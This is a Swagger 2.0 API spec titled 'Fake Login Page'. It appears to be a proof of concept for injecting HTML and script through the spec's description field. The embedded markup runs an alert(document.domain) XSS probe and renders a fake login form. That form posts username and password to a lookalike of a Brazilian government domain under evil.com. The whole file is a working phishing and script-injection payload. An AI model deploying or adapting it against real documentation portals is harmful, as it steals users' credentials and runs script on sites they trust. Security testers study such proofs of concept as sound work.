swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description:'<div>
        <!-- The entire content is now inside this <div> -->

        <!-- The inline CSS -->
        <style>
            .mytitle {
                width: 100%;
                height: 250px;
                background-image: linear-gradient(0deg, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url('/Users/aritdutta/Desktop/test.png');
                background-size: cover;
                color: white;
                display: flex;
                flex-direction: column;
                align-items: center;
                justify-content: center;
            }

            .transparent {
                background-color: transparent;
                border: 1px solid rgba(255, 255, 255, 0.7);
                color: white;
            }
        </style>

        <!-- The inline JavaScript -->
        <script>
            function hey() {
                alert(document.domain);
            }
        </script>

        <!-- The actual HTML content inside a single <div> -->
        <div class="container mt-5">
            <div class="row">
                <div class="col-md-6 offset-md-3">

                    <div class="card border-dark mb-3">

                        <div class="card">
                            <div class="mytitle">
                                <div class="card-body">
                                    <!-- Form inside a div -->
                                    <form action="https://ati.to.gov.br.evil.com" method="post">

                                        <div class="form-group row">
                                            <label for="inputUsername" class="col-sm-4 col-form-label">Username:</label>
                                            <div class="col-sm-10">
                                                <input type="username" class="form-control transparent" id="inputUsername" placeholder="Username">
                                            </div>
                                        </div>

                                        <div class="form-group row">
                                            <label for="inputPassword" class="col-sm-4 col-form-label">Password:</label>
                                            <div class="col-sm-10">
                                                <input type="password" class="form-control transparent" id="inputPassword" placeholder="Password">
                                            </div>
                                        </div>
                                        <br>

                                        <div class="d-grid gap-6">
                                            <button onclick="hey()" type="submit" class="btn btn-dark transparent">Login</button>
                                        </div>

                                    </form>
                                </div>
                            </div>
                        </div>

                    </div>

                </div>
            </div>

        </div>

    </div>'  

paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
